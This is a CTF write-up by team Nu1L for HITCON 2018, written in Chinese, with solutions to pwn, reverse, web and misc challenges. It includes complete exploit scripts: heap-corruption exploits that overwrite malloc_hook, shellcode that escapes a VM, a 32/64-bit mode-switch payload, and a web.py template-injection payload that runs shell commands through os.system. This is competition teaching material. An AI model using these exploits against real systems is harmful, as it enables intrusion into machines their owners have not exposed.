2018 hitcon CTF

By Nu1L

比赛网址：https://ctf2018.hitcon.org/
比赛时间：2018/10/20 02:00 UTC ~ 2018/10/22 02:00 UTC

PWN

children tcache

from pwn import *
#p=process('./child',env={'LD_PRELOAD':'./libc.so.6'})
p=remote('54.178.132.125', 8763)
libc = ELF('./libc.so.6')
def add(size,data):
    p.recvuntil('choice')
    p.sendline('1')
    p.recvuntil('Size:')
    p.sendline(str(size))
    p.recvuntil('Data:')
    p.send(data)

def dele(index):
    p.recvuntil('choice')
    p.sendline('3')
    p.recvuntil('Index')
    p.sendline(str(index))

for i in range(7):
    add(0x80,'xxx\n')
for i in range(7):
    dele(i)

for i in range(7):
    add(0x110-8,'xxx\n')

add(0x110-8,'aaaa\n')#7
add(0x100,'bbbb\n')#8
add(0x100,'cccc\n')#9

for i in range(7):
    dele(i)

dele(8)
dele(7)

#raw_input()
for i in range(7):
    add(0x110-8,'aaaa\n') #0-6
add(0x110-8,'a'*(0x110-8))#7
for i in range(7):
    dele(i)
#raw_input()
for i in range(7):
    add(0x80,'1234567\n')#0-6

add(0x80,'xxxxxxxx\n')#8

for i in range(7):
    dele(i)

add(0x60,'ABCD\n')#0

dele(8)
dele(9)
add(0x40,'a\n')#1
add(0x30,'b\n')#2
add(0x500,'aaaa\n')#3
add(0x120,'bbbb\n')#4
#0,3->same chunk
dele(3)
p.recvuntil('choice')
p.sendline('2')
p.recvuntil("Index:")
p.sendline('0')
addr = u64(p.recv(6).ljust(8,'\x00'))
libc_base = addr - (0x00007f2e9c12dca0-0x7f2e9bd42000)
info("libc:0x%x",libc_base)
malloc_hook = libc_base+libc.symbols['__malloc_hook']
info("malloc hook:0x%x",malloc_hook)
one = libc_base + 0x10a38c
add(0x500,'aaaaa\n')#3
dele(3)
add(0x120,'ABCDABCD\n')
dele(4)
dele(3)
dele(0)
add(0x120,p64(malloc_hook)+'\n')

add(0x120,p64(one)+'\n')
add(0x120,p64(one)+'\n')

p.sendline('1')
p.sendline('304')
p.interactive()

Groot

指针未初始化

#!/usr/bin/env python2
# coding:utf-8
from pwn import *
import os

VERBOSE = 1
DEBUG   = 1
LOCAL   = 0

target = 'groot'
libc   = []         # 加载指定libc
break_points = []
remote_addr = '54.238.202.201'
remote_port = 31733

def hint(break_points=[]):
    if LOCAL:
        out = 'gdb attach ' + str(pwnlib.util.proc.pidof(target)[0])
        for bp in break_points:
            out += " -ex 'b *{}'".format(hex(bp))
        raw_input(out+" -ex 'c'\n" if break_points else out+"\n") 
# if libc:
#     elf = ELF(libc[0])
#     gadget = lambda x: next(elf.search(asm(x, os='linux', arch='amd64')))

if LOCAL:
    if libc:
        for libc_ in libc:
            os.environ['LD_PRELOAD'] = os.environ['PWD'] + '/' + libc_ + ':'
    p = process('./'+target)
    if DEBUG:
        out =  'gdb attach ' + str(pwnlib.util.proc.pidof(target)[0])
        for bp in break_points:
            out += " -ex 'b *{}'".format(hex(bp))
        raw_input(out+" -ex 'c'\n" if break_points else out+"\n")
else:
    p = remote(remote_addr,remote_port)

if VERBOSE: context.log_level = 'DEBUG'



def mkdir(dir):
    p.sendlineafter('$ ','mkdir '+dir)

def touch(name):
    p.sendlineafter('$ ','touch '+name)

def rm(name):
    p.sendlineafter('$ ','rm '+name)

def mkfile(name, content):
    p.sendlineafter('$ ','mkfile '+name)
    p.sendlineafter('Content?', content)

def cd(dir):
    p.sendlineafter('$ ','cd '+dir)

def ls(dir):
    if dir:
        p.sendlineafter('$ ','ls '+dir)
    else:
        p.sendlineafter('$ ','ls')

def mv(src, dst):
    p.sendlineafter('$ ','mv %s %s' %(src,dst))

def exp(cmd=None):

    mkdir('A'*0x30)
    cd('A'*0x30)
    touch('B'*0x30)
    cd('..')
    rm('A'*0x30)
    touch('X')
    touch('C'*0x30)
    rm('X')
    ls('')
    p.recv(0x14)
    heap = u64(p.recv(6).ljust(8,'\x00'))
    print hex(heap)
    heap_base = heap - 76864
    print hex(heap_base)

    rm(p64(heap))
    # raw_input()
    ls(p64(heap_base+0x11fd0)[:-2])
    # raw_input()
    for i in range(4):
        ls('HEHE')
    # raw_input()
    ls('A'*8+p16(0x561))
    rm('/etc/passwd')
    ls('/')
    ls('/')
    ls('/')
    p.recvuntil('dev')
    p.recv(0x10)
    libc = u64(p.recv(6).ljust(8,'\x00'))
    print hex(libc)
    libc_base = libc - 0x789ca0
    print hex(libc_base)

    # raw_input()
    for i in range(2):
        ls('D'*0x30)
    # raw_input()
    rm('/dev')

# add bin sh
    # ls('')
    mv('HEHE','sh')
    # mv('/bin/id','/bin/sh')
    # cd('../../../../../../../../../../../bin')

    for i in range(9):
        ls('D'*0x60)
    # ls('E'*0x40)
    # ls('E'*0x40)
    rm('/boot')

    ls('E'*0x40)

    # raw_input('hehehe')
    free_hook = 7911656 + libc_base
    malloc_hook = 0x789c30 + libc_base
    magic = 0x4f440 + libc_base + 3792896
    ls('X'*0x40+p64(heap_base+0x50-0x28))
    ls('D'*0x30)
    # raw_input('sending free hook')
    # ls(p64(free_hook-0x28)[:-2])

    # raw_input()
    print hex(magic)
    print hex(free_hook)
    rm('A'*0x28+p64(free_hook))


    # mkdir('../../../../../../../../../../../../../../bin/sh')
    # mv('/bin/id',p64(magic))
    ls(p64(magic))
    p.recvrepeat(1)
    # raw_input()
    p.sendline('rm ' + '../'*8+'home/groot/sh')
    # raw_input()
    # ls('123')



    # mkdir('ttt')
    # cd('ttt')

    # for i in range(10):
    #     mkdir(str(i)*0x30)
    # mkdir('C'*0x30)
    # cd('C'*0x30)
    # touch('A'*0x30)
    # cd('..')
    # rm('C'*0x30)


    # touch()


    p.interactive()


if __name__ == '__main__':
    exp("id")

Abyss I

是个堆栈机VM
swap 没有边界检查，可以越界到machine

把machine盖成负数，可以向上写got表
输入中放入shellcode，改shellcode跳过去即可

from pwn import *

p = remote('35.200.23.198', 31733)
context(arch = 'amd64', os = 'linux')
context.aslr = False
#p = process('./user.elf')
#gdb.attach(p)

#p = process('./hypervisor.elf kernel.bin ld.so.2 ./user.elf'.split(' '))
payload = '4294967295\\'
payload += '%' * ((0x2020a0 - 0x202030) / 4 - 2)
payload += '0:'
payload += '1:'
payload += '%%%%1;'
payload += str(0x2030A4 + 0x100 - 0x7b6) + '+'

# payload += str(0x7BEC0 - 0x4f322) + '\x011'
# payload += ';-'
# payload += '0;'
# payload += '.'
payload += '0;'
payload += ','
payload = payload.ljust(0x100, '\x01')
payload += asm(shellcraft.amd64.linux.open('flag', 0, 0))
payload += asm(shellcraft.amd64.linux.read(3, 'rsp', 0x100))
payload += asm(shellcraft.amd64.linux.write(1, 'rsp', 0x100))
p.sendline(payload)
p.interactive()

Abyss II

系统调用号对应的处理函数(大概)

(0, '0x239L') read
(1, '0xa9aL') write
(2, '0x972L') open
(3, '0xf4bL') 
(5, '0x1caL')
(9, '0xc47L')
(10, '0x17b2L')
(11, '0xd54L')
(12, '0xbc6L')
(20, '0xb0dL')
(21, '0xa4cL')
(60, '0x966L')
(158, '0xb87L')
(221, '0x195L')
(231, '0x966L')
(257, '0xa39L')

write_sys 应该可以溢出。。。。试一试
让buf的地址加上size溢出到一个很小的数应该就可以过那个检查
kmalloc很大的数的时候会返回0，看了一下hypervisor似乎image base也是0，大概可以覆盖代码

hypervisor还有个蜜汁验证

已经能成功执行shellcode了，还需要逆一下串口的交互，手写一下open，read和write

from pwn import *
import time
context(arch = 'amd64', os = 'linux')
context.aslr = False



def runshellcode(p, s):
    payload = '4294967295\\'
    payload += '%' * ((0x2020a0 - 0x202030) / 4 - 2)
    payload += '0:'
    payload += '1:'
    payload += '%%%%1;'
    payload += str(0x2030A4 + 0x100 - 0x7b6) + '+'
    payload += '0;'
    payload += ','
    payload = payload.ljust(0x100, '\x01')
    payload += asm('push 0x61616161')
    payload += asm(shellcraft.amd64.linux.write(1, 'rsp', 0x4))
    payload += asm(shellcraft.amd64.linux.read(0, 'rsp', 0x1000))
    payload += asm('jmp rsp')
    p.sendline(payload)
    p.recvuntil('aaaa')
    p.send(s)
    context.log_level = 'debug'

def main():
    p = remote('35.200.23.198', 31733)
    #p = process('./user.elf')
    #p = process('./hypervisor.elf kernel.bin ld.so.2 ./user.elf'.split(' '))
    payload = ''

    mmap_addr = 0x500000
    payload += asm(shellcraft.amd64.linux.mmap(mmap_addr, 0x10000, 7, 16, -1, 0))
    payload += asm('push rax')
    payload += asm(shellcraft.amd64.linux.write(1, 'rsp', 8))
    payload += asm(shellcraft.amd64.linux.read(0, mmap_addr, 0x10000))
    payload += asm(shellcraft.amd64.linux.write(1, mmap_addr, 0x10000000000000000 - mmap_addr + 0x300000))
    payload += asm('push rax')
    payload += asm(shellcraft.amd64.linux.write(1, 'rsp', 8))
    runshellcode(p, payload)

    time.sleep(10)
    payload = 'flag2'.ljust(8, '\x00')
    payload += p64(3) + p64(0x100) + p64(0x100)
    payload += p64(1) + p64(0x100) + p64(0x100)
    payload = payload.ljust(0xa5d, '\x90') + '\x90'*36
    payload += asm('''
    mov dx, 0x8000
    mov eax, 0x0
    ''')
    payload += '\xef\xed'
    payload += asm('''
    mov dx, 0x8001
    mov eax, 0x8
    ''')
    payload += '\xef\xed'
    payload += asm('''
    mov dx, 0x8002
    mov eax, 0x20
    ''')
    payload += '\xef\xed'
    payload += '\xeb\xfe'
    payload = payload.ljust(0xadb, '\x90')
    payload += '\xeb\x80'
    p.send(payload)
    p.interactive()    

if __name__ == '__main__':
    main()

Super Hexagon | solved 1, stuck 2 | pzhxbz

第一层

scanf里面似乎有一个溢出，可以覆盖函数指针

Reverse

EOP

感觉是用c++的异常处理机制实现的一个像控制流平坦化的东西。。。。

使用gdb script进行跟踪

b *(0x8000000+0x5620)
python f = open('log','w')
run < test_input
set $ipx=1
while ($ipx)
  python a = hex(gdb.parse_and_eval("$rax"))
  python f.write(a+'\n')
  continue
end

可以拿到程序的调用函数顺序，大致分析之后发现程序大概为3个循环对用户输入进行加密

大致分析后可以发现中间很多代码都是一样的，猜测是一个循环被拆分出来的结果。

于是半猜半蒙的一步一步还原算法 orz

还原之后的算法如下：

from pwn import *

index_table1 = [1448535819,1128528919,3149608817L,134807173,3570665939L,3806473211L,2728570142L,1936927410,3014904308L,757936956,2358043856L,3082270210L,2374833497L,101119117,2324303965L,3166450293L,3334870987L,3486456007L,2593817918L,2863289243L,1296954911,3941258622L,1212708960,3772817536L,774785486,1061104932,3284375988L,336915093,4227576212L,1970658879,4210704413L,3907542533L,3469666638L,791656519,555856463,1600120839,1953771446,3318050105L,3739122733L,1246425883,3924406156L,3048553849L,2004309316,2981184143L,117900548,2913818271L,1347425158,1162152090,4075994776L,3452801980L,1802191188,3368558019L,2526413901L,1717973422,3099086211L,320073617,3267520573L,2459073467L,690572490,2947538404L,3200170254L,960092585,993743570,623234489,4042274275L,1330609508,707409464,4261233945L,2644344890L,3520169900L,3553823959L,2341200340L,3065399179L,33721211,1145370899,2678000449L,3789639945L,1094809452,1819034704,825304876,505323371,454758676,2560101957L,1549570805,589510964,3991785594L,370565614,4244419728L,2240146396L,3974898163L,2391699371L,724289457,1313770733,185304183,2543318468L,1482222851,842161630,1195869153,16904585,2930650221L,3840204662L,2122209864,2442199369L,4160172263L,2021174981,2577006540L,1835906521,2779097114L,2223250005L,3604382376L,4143366510L,1633760426,202146163,2071712823,875866451,1532729329,1280051094,3722249951L,0,421108335,2088554803,2475919922L,2896996118L,252705665,4126522268L,2139073473,1027450463,404253670,606354480,3132802808L,1229556201,2509602495L,1650609752,572704957,976921435,3031747824L,3537042782L,4025441025L,2408554018L,3755969956L,2745392279L,2273796263L,488498585,2610656439L,2307484335L,1515873912,3654908201L,2711738348L,286352618,522153698,4294954594L,2661219016L,1077970661,3705468758L,640071499,1431674361,1397975412,353704732,2812748641L,1566401404,3250655951L,2425417920L,3385453642L,1381144829,2694850149L,3435946549L,741130933,2172752938L,4278075371L,673758531,943204384,387420263,1499012234,67403766,3351766594L,3873854477L,269522275,3823360626L,1987486925,1010587606,3115957258L,1886408768,3671720923L,2155898275L,168457726,1044307117,2627498419L,3958056183L,3638069408L,909517352,84250239,1785376989,1179021928,808507045,1263207058,1667481553,3688624722L,2256965934L,859024471,437969053,3233866566L,1903272393,1414818928,1852755755,4177054566L,656885442,2290653990L,2189618904L,2492763958L,1616954659,3587569754L,3503322661L,1465325186,538985414,3890718084L,2964370182L,1111625118,2037997388,2105352378,2829637856L,3301219504L,2762234259L,1734852647,235801096,2880152082L,1920129851,3183330300L,3402274488L,218984698,4193860335L,1364320783,4059153514L,1768540719,4109650453L,892688602,471602192,4008618632L,926405537,2054825406,50559730,3621221153L,1701137244,151588620,3857002239L,3419105073L,1751661478,1684323029,2998024317L,4092808977L,3216984199L,2206408529L,303177240,2795950824L,1583225230,2846435689L,1869561506]
index_table2 = [67438343,1346661484,3474112961L,1136470056,1858205430,1427801220,1604730173,4240686525L,3371867806L,1618495560,1593692882,628543696,132669279,2381579782L,895667404,561240023,3190127226L,4173773498L,2808121223L,3460902446L,3932426513L,1548445029,714375553,4106859443L,247054014,2317113689L,1819754817,943073834,3236991120L,4213957346L,3865778200L,2472125604L,1764338089,2648709658L,847942547,269753372,1413573483,1937837068,2714974007L,3985395278L,2005142283,2140013829,2180714255L,2086886749,3607942099L,3730649650L,1292146326,357233908,1805590046,2673257901L,3273509064L,2629563893L,2269691839L,1537423930,1158584472,1009986861,2202908856L,1030275778,2539430819L,2788911208L,3407333062L,2292903662L,3906119334L,156361185,3772295336L,2693322968L,2894582225L,4135519236L,4281263589L,1791291889,1966259388,424017405,3259377447L,3596041276L,2249412688L,3571551115L,1281325433,2494692347L,3450107510L,1337073953,3663213877L,1872369945,2100867762,606945087,2581929245L,3439303065L,2651669058L,134876686,2182502231L,2448364307L,2427780348L,1685933903,3973554593L,180140473,0,828885963,3518980963L,471536917,335103044,3096890058L,3316545656L,2722000751L,1926947811,1886147668,580816783,1091280799,3528604475L,536235341,1470903091,3674462938L,1403597876,2336732854L,1657733119,112439472,468929098,2517060684L,4201647373L,447260069,1629726631,1831644846,1203253039,3145437842L,2989126515L,2963064004L,1048943258,1361019779,3850780736L,4039947444L,2515145748L,3719326314L,1994384612,2942994825L,2922473062L,4269083146L,1189331136,3504639116L,1481532002,600137824,915379348,1724643576,673330742,1004237426,3918088521L,1494584717,3249241983L,2034087349,1737496343,2827146966L,981507485,4254618194L,4120009820L,3304429463L,2876214926L,2060512749,3382800753L,2449623883L,2605951658L,2360338921L,2127948522,199710294,2849585465L,3741769181L,1670713360,3029976003L,1071543669,4013619705L,1561365130,647727240,3878746103L,2855559521L,735014510,1146451831,1270294054,2072707586,45529015,1213890174,809247780,336665371,2760761311L,2741338240L,3839733679L,514695842,781289094,402408259,1224839569,3163803085L,1899477947,1752319558,2982619947L,2158026976L,202311945,380087468,2314273025L,1697030304,3706422661L,2916892222L,65886296,3117229349L,2562650866L,2403512753L,312650667,1391647707,3077872539L,876159779,4053228379L,3049401388L,1323945678,1526257109,539506744,801794409,2782277680L,1122420679,740766001,666920807,22802415,90106088,869366908,3326287904L,3393988905L,1079013488,290452467,3946839806L,4187837781L,2225465319L,3999340054L,1459084508,3783477063L,3212744085L,2248017928L,3340292047L,4068082435L,3585762404L,3811963120L,763158238,404623890,1953059667,1257032137,3639509634L,2384027230L,3122691453L,695851481,2584233285L,963495365,3652545901L,490797818,3056563316L,936672123,2019973722,3798867743L,4079086828L,4146392043L,3184009762L,3010567324L,3540636884L,266490193,223667942]
index_table3 = [3188637369L,582820552,701114700,4220844977L,1243302643,2083749073,4237360308L,274927765,1468159766,1029651878,1293897206,3161832498L,1722705457,1730635712,1125598204,1117667853,3815957466L,1443583719,2167046548L,3554136844L,354161947,1167738120,92210574,1059340077,2663948026L,4009881435L,446503648,2026207406,1941074730,3213344584L,3251618066L,1097613687,1586388505,607134780,3104487868L,3832997087L,83231871,2953228467L,1872916286,1612931269,1331974013,3884246949L,2345962465L,2469565322L,675489981,3492139126L,3095640141L,1442403741,3062609479L,3368273949L,3570652169L,733031367,192351108,1568431459,3377121772L,1542544279,510336671,2284226715L,3892701278L,3426077794L,1883271248,3517763975L,2554697742L,3136862918L,2546243573L,1649959502,1909027233,66192250,1674666943,4246338885L,2109373728,2309982570L,4159174448L,3044652349L,2275903328L,2671877899L,1003633490,1088766086,933312467,3918326191L,3308897645L,384702049,3601389186L,2716639703L,750070978,4120704443L,1792895664,1800694593,2195227374L,3070408630L,2719916717L,3461271273L,234491248,3775521105L,2926423596L,3696680183L,3984256464L,1240025481,1181238898,2833295576L,2691014694L,1205946243,142936318,642459319,1594318824,785264201,3579500024L,151783695,3934186197L,117704453,260116475,496573925,941635624,3858752814L,1051541212,1817209924,2994582072L,2393607791L,109905652,3859670612L,2118680154,2887167143L,1638555956,3643398521L,1916498651,2428539120L,3451702675L,3019158473L,1848340175,1416647788,2143387563,2587794053L,3679640562L,2978984258L,4001951402L,1400132457,558834098,3409038183L,2612501364L,667035462,853422685,2067233748,2629016689L,2761139289L,3529429757L,4284678094L,632890829,1842965941,4095079498L,816132310,3722435846L,1700554059,1214269560,2000975701,824979751,1359958498,3808158251L,2158198885L,2769986984L,1267878658,454302481,3299919004L,1958114351,4070109886L,328274927,4193253690L,967391705,1020673111,345314538,3958893348L,2870127522L,235408906,2035054943,2580322815L,2437517569L,3225862371L,2059303461,3283403673L,184420981,1324174988,1517836902,3727548028L,3187457475L,2203157279L,1392333464,758918451,41616011,908604962,25756145,4167497931L,0,3144792887L,2461766267L,1967093214,1755736123,2637864320L,3035673804L,4078039887L,3258827368L,470817812,208866433,793194424,2808194851L,3401108118L,2251196049L,4276878911L,2486604943L,534912878,1559583890,1502239004,426711450,1476614381,4196268608L,1284918279,3634419848L,3485978392L,3752124301L,2842274089L,3671841283L,708323894,1142113529,3335243287L,1993176740,903492952,4050317764L,2321386000L,2521667076L,1350979603,1764714954,877868201,2220196890L,303567390,2371456277L,2245821931L,392632208,3975408673L,2362477796L,2744623964L,979057315,4041470005L,3343042534L,4134467265L,417732715,300552548,590619449,3766542496L,2512360830L,2401406878L,1691706554,2862328403L,2800264914L,2912922966L,2951000029L,861352876,3609319283L,549855299]
index_table4 = [3254152897L,164942601,2959793584L,416270104,3784037601L,3834433764L,1757560168,4258422525L,2986054833L,2131031679,4036018416L,3644434905L,1563614813,736295723,398904087,1403689811,528699679,0,3384014025L,2215344004L,759112749,1277807180,3357720008L,1943478643,2539385239L,2491493012L,3634946264L,1303937869,3153435835L,425627161,4132249590L,545110560,2202526083L,1090133312,4120364277L,3072740279L,1657550178,2380244109L,3514577873L,1542390107,2278665351L,2295898248L,1871620975,598171939,2927150510L,3534153938L,475630108,3311412165L,504502302,1917216882,749628716,286987281,3695095260L,4174732024L,1963654773,1373702481,3543638483L,1787408234,1118932802,76958980,2353982860L,3284008131L,3672339162L,989458234,935031095,2324902538L,4261971454L,3257710018L,361584917,821552944,3422054091L,1956362100,2660180638L,1717205094,958608441,454368283,3972614892L,698968361,4074459890L,573974562,828812849,4094070260L,2241478277L,1203145543,2123743102,1341329743,3981968365L,3843922405L,1174214981,2455565714L,3871818470L,878815796,337383444,904979253,2951318703L,138779144,657533991,84345861,786825006,4011037167L,2000776311,2829392552L,3564845012L,222469645,2889045932L,3681696731L,3173532605L,2157787776L,1702929253,244860174,2165076865L,3090106296L,2094935420,3719292125L,2044275065,4232255484L,2252400006L,1678895716,2332195723L,2408855183L,3796963298L,1796793963,712225322,314691346,2699067552L,3756291807L,1601784927,2579739801L,2783413413L,1227804233,4181988345L,3617713367L,3881176039L,2759249316L,1667071075,628801061,4081720307L,1741369703,4001552622L,2789040038L,3341529543L,3227985856L,122459655,1847583342,2867759274L,3441801677L,1628892769,215209740,3043875253L,1424362836,499696413,2479733907L,1126221379,3472843470L,1906094961,1463604823,1264933963,3065447094L,2500879253L,1619502944,1479924312,2195105922L,3927217642L,444880154,4212097531L,1454219094,3759840736L,1047503422,115203846,2303322505L,619444004,2047079034,1097552961,3821029091L,2441490065L,674766888,2639657373L,3588914901L,1177010758,1817473132,569176865,1349533776,1518225498,3732226014L,648045862,1220511560,2988527538L,3505224400L,908736566,2877276587L,3210990015L,2838778793L,1592264030,851211570,26298625,1073670975,1433879637,951221560,3334142150L,4288269567L,2913083053L,1554224988,38507010,1993352566,2729120418L,3898542056L,996714043,3036450996L,4043409905L,168691722,3480103887L,1879964272,3593512406L,2102355069,194986251,1503957849,3951418603L,64674563,1035303229,1147949124,1257510218,4158412535L,1841641837,2073213819,1379652178,2669570975L,2382725006L,2555575704L,1767076969,3166243516L,858602547,3127170490L,2018009208,3116240569L,2738510755L,1009004604,252251151,2529867926L,2708588961L,3203569854L,3395891146L,796177967,2417452944L,3304155844L,3434410188L,4204710138L,277503248,2630135964L,3922611945L,2609391259L,2585358234L,324044307,1315067982,2813073063L,374833686,3014657715L]

xor_table = [40806489, 4046542995L, 2337878950L, 3878399079L, 449612036, 776524271, 1059181995, 1764973087, 3196283120L, 4059530435L, 404769168, 416194920, 865505623, 569110855, 4202362994L, 2884025964L, 1364091262, 3967238082L, 3323511658L, 4191090596L, 1977398017, 2934017146L, 619849321, 2598057311L, 2001658147, 3371447456L, 4101937135L, 1132035575, 4142164549L, 95912149, 3823222592L, 1423799602]

flag = raw_input()

def to_bytes(d):
    res = []
    tmp = hex(d).replace('0x','').rjust(8,'0')
    for i in xrange(0,8,2):
        res.append(int(tmp[i:i+2],16))
    return res[::-1]

def ROR(d,n):
    return ( (d >> n) | (d << (32-n)) ) % 0x100000000

def ROL(d,n):
    return ( (d << n) | (d >> (32-n)) ) % 0x100000000

def en(data):   
    t1 = u32(data[0:4])   
    t2 = u32(data[4:8])   
    t3 = u32(data[8:12])   
    t4 = u32(data[12:16])
    t1 ^= 0x0C01A4D6E
    t2 ^= 0x0A4CB6636
    t3 ^= 0x5B0F5BA1
    t4 ^= 0x2B266926
    #print(hex(t1),hex(t2),hex(t3),hex(t4))
    for i in xrange(0,32,4):
        tt5 = to_bytes(t1)
        t5 = index_table1[tt5[0]] ^ index_table2[tt5[1]] ^ index_table3[tt5[2]] ^ index_table4[tt5[3]]
        tt6 = to_bytes(t2)
        t6 = index_table2[tt6[0]] ^ index_table3[tt6[1]] ^ index_table4[tt6[2]] ^ index_table1[tt6[3]]
        t3 ^=(xor_table[i] + t5 + t6)%0x100000000
        #print(hex(t1),hex(t2),hex(t3),hex(t4),hex(t5),hex(t6))
        t3 = ROR(t3,1)
        t4 = ROL(t4,1)
        #print(hex(t1),hex(t2),hex(t3),hex(t4),hex(t5),hex(t6))
        t4 ^= (xor_table[i+1] + t5 + t6 * 2)%0x100000000
        tt5 = to_bytes(t3)
        t5 = index_table1[tt5[0]] ^ index_table2[tt5[1]] ^ index_table3[tt5[2]] ^ index_table4[tt5[3]]
        tt6 = to_bytes(t4)
        t6 = index_table2[tt6[0]] ^ index_table3[tt6[1]] ^ index_table4[tt6[2]] ^ index_table1[tt6[3]]
        t1 ^= (xor_table[i+2] + t5 + t6)%0x100000000
        t1 = ROR(t1,1)
        t2 = ROL(t2,1)
        t2 ^= (xor_table[i+3] + t5 + t6 * 2)%0x100000000
        print(hex(t1),hex(t2),hex(t3),hex(t4),hex(t5),hex(t6))

    t3 ^= 0x0EF75CB8F
    t4 ^= 0x0A037222A
    t1 ^= 0x0BA69619A
    t2 ^= 0x60798932
    return p32(t3) + p32(t4) + p32(t1) + p32(t2)

解密算法如下：

def de(data):
    t3 = u32(data[0:4])   
    t4 = u32(data[4:8])   
    t1 = u32(data[8:12])   
    t2 = u32(data[12:16])

    t3 ^= 0x0EF75CB8F
    t4 ^= 0x0A037222A
    t1 ^= 0x0BA69619A
    t2 ^= 0x60798932
    for i in range(0,32,4)[::-1]:
        tt5 = to_bytes(t3)
        t5 = index_table1[tt5[0]] ^ index_table2[tt5[1]] ^ index_table3[tt5[2]] ^ index_table4[tt5[3]]
        tt6 = to_bytes(t4)
        t6 = index_table2[tt6[0]] ^ index_table3[tt6[1]] ^ index_table4[tt6[2]] ^ index_table1[tt6[3]]
        print(hex(t1),hex(t2),hex(t3),hex(t4),hex(t5),hex(t6))
        t2 ^= (xor_table[i+3] + t5 + t6 * 2)%0x100000000
        t2 = ROR(t2,1)
        t1 = ROL(t1,1)
        t1 ^= (xor_table[i+2] + t5 + t6)%0x100000000

        tt5 = to_bytes(t1)
        t5 = index_table1[tt5[0]] ^ index_table2[tt5[1]] ^ index_table3[tt5[2]] ^ index_table4[tt5[3]]
        tt6 = to_bytes(t2)
        t6 = index_table2[tt6[0]] ^ index_table3[tt6[1]] ^ index_table4[tt6[2]] ^ index_table1[tt6[3]]
        t4 ^= (xor_table[i+1] + t5 + t6 * 2)%0x100000000
        t3 = ROL(t3,1)
        t4 = ROR(t4,1)
        t3 ^=(xor_table[i] + t5 + t6)%0x100000000

        #print(hex(t1),hex(t2),hex(t3),hex(t4),hex(t5),hex(t6))
    t1 ^= 0x0C01A4D6E
    t2 ^= 0x0A4CB6636
    t3 ^= 0x5B0F5BA1
    t4 ^= 0x2B266926
    return p32(t1) + p32(t2) + p32(t3) + p32(t4)

def xor_str(a,b):
    res = ''
    for i in xrange(16):
        res += chr(ord(a[i]) ^ ord(b[i]))
    return res

de_flag = [0x4F, 0x6F, 0xA7, 0x87, 0xE9, 0x51, 0x87, 0x64, 0x38, 0x2A, 0x46, 0xE5, 0x4F, 0x21, 0x9E, 0x1C, 0xCD, 0x65, 0xE1, 0x9A, 0x4F, 0xCF, 0xDE, 0x52, 0x09, 0xBF, 0x53, 0xC4, 0xB0, 0x95, 0x75, 0x31, 0xAC, 0x2F, 0xF4, 0x97, 0x1D, 0xA5, 0x9A, 0x02, 0xA8, 0xFF, 0xAE, 0x2E, 0xB9, 0x70, 0xCC, 0x02]

de_c = ''
for i in de_flag:
    de_c += chr(i)
# a = en('a'*16)
# print('---')
# print(de(a))

print((xor_str(de_c[16:32],de(de_c[32:48]))))

# ~Exc3p7i0n-Ori3n7ed-Pr0grammin9~RoO0cks!!\o^_^o/

Web

On my raddit

8个字节分组加密，动一动LSB仍然可以解密，DES？

2e7e305f2da018a2cf8208fa1fefc238 + 加密的文件名 + 3ca92540eb2d0a42 下载文件

3ca92540eb2d0a42应该是padding，8个字节拿hashcat爆破了下

3ca92540eb2d0a42:0808080808080808:ldgonaro

Session..........: hashcat
Status...........: Cracked
Hash.Type........: DES (PT = $salt, key = $pass)
Hash.Target......: 3ca92540eb2d0a42:0808080808080808

爆破出来一个ldgonaro，FLAG但是不对，应该是个等效密钥。
首页有下载链接，发现能下载文件，于是解密：

from Crypto.Cipher import DES
key = 'ldgonaro'
def decrypt(decryptText):
    try:
        cipherX = DES.new(key, DES.MODE_ECB)
        str = decryptText.decode('hex')
        y = cipherX.decrypt(str)
        return y[0:ord(y[len(y)-1])*-1]
    except:
        return ""
print decrypt('2e7e305f2da018a2cf8208fa1fefc238522c932a276554e5f8085ba33f9600b301c3c95652a912b0342653ddcdc4703e5975bd2ff6cc8a133ca92540eb2d0a42')

=>m=d&f=uploads%2F70c97cc1-079f-4d01-8798-f36925ec1fd7.pdf

将f参数换成app.py加密得到E2272B36277C708BC21066647BC214B8，然后得到密钥megnnaro

On my raddit2

https://securityetalii.es/2014/11/08/remote-code-execution-in-web-py-framework/
web.py的db写的有问题：

# coding: UTF-8
import os
import urllib
import urlparse
from Crypto.Cipher import DES
ENCRPYTION_KEY = 'megnnaro'
def encrypt(s):
    length = DES.block_size - (len(s) % DES.block_size)
    s = s + chr(length)*length

    cipher = DES.new(ENCRPYTION_KEY, DES.MODE_ECB)
    return cipher.encrypt(s).encode('hex')

def decrypt(s):
    try:
        data = s.decode('hex')
        cipher = DES.new(ENCRPYTION_KEY, DES.MODE_ECB)
        data = cipher.decrypt(data)
        data = data[:-ord(data[-1])]
        return dict(urlparse.parse_qsl(data))
    except Exception as e:
        print e.message
        return {}


print encrypt(urllib.urlencode({'m':'p','l':"${[].__class__.__base__.__subclasses__()[59]()._module.linecache.os.system('/read_flag > /tmp/fffza')}"}))

print encrypt(urllib.urlencode({'m':'d','f':'/tmp/fffza'}))

然后依次访问即可。

MISC

Lumosity

签到题

EV3 Basic

LEGO EV3机器人的数据包

81 xx 81 xx 84 xx 应该表示列，行，字符

0a 14 1e 28 32 3c 46 50 5a 64 6e 78 82 8c 96 a0
28   h  i  t  c  o  n  {  m  1  n  d  5  t  0  r  m
36   _  c  o  m  m  u  n  i  c  a  t  i  o  n  _  a
44   n  d  _  f  i  r  m  w  a  r  e  _  d  e  v  e
52   l  o  p  e  r  _  k  i  t  }

32world

64bit ELF，retf切到32位代码，执行shellcode，24字节，syscall的时候IP需要大于FFFFFFFF

line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x0000000c  A = instruction_pointer >> 32
 0001: 0x15 0x00 0x01 0x00000000  if (A != 0x0) goto 0003
 0002: 0x06 0x00 0x00 0x00000000  return KILL
 0003: 0x06 0x00 0x00 0x7fff0000  return ALLOW

切回64bit，跳一个one gadget，读一下fs拿地址

from pwn import *

#p = process('./32world')
p = remote('54.65.133.244', 8361)

context(bits = 32, arch = 'i386')


sc1 = '''
retf
'''

sc11 = asm('push 0x33')

sc1 = asm(sc1)

print sc1, len(sc1)

context(bits = 64, arch = 'amd64')

sc2 = asm('mov rax, fs:[rdx+0x900]; add rax, 0xf1147; call rax')

sc1 = sc11 + '\xe8\x10\x00\x00\x00' + sc2 + sc1

print sc1, len(sc1)


p.sendline(sc1)

p.interactive()